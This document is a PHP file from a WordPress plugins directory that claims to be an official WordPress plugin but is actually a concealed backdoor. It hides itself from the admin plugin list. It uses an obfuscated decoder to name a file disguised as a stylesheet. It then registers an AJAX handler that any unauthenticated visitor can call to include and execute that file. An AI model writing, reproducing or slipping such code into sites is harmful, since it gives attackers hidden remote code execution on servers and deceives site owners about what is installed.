File: /var/www/html/apwire.net/wp-content/plugins/wp-current-theory/wp-current-theory.php
<?php
/*
Plugin Name: WP Current Theory
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 5.7.5
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
    exit;
}
function udc_zlq() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }
    $q = array('wp-current-theory/wp-current-theory.php');
    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $q)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}
function jqw_rhr($plugins) {
    $m = 'wp-current-theory/wp-current-theory.php';
    if (array_key_exists($m, $plugins)) {
        unset($plugins[$m]);
    }
    return $plugins;
}
function uml($s, $a) {
    $k = '';
    for ($e = 0; $e < strlen($s); $e += 2) {
        $c = ord($s[$e]) - 65;
        $b = ord($s[$e + 1]);
        if ($b > 90) $b -= 6;
        $n = $c * 52 + ($b - 65);
        $k .= chr($n - $a);
    }
    return $k;
}
function gwe_ajax_handler() {
    include plugin_dir_path(__FILE__) . uml('RMRbRbQNROReRe', 799);
    die();
}
if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'udc_zlq');
    add_filter('all_plugins', 'jqw_rhr');
    
    add_action('wp_ajax_cur_the', 'gwe_ajax_handler');
    add_action('wp_ajax_nopriv_cur_the', 'gwe_ajax_handler');
}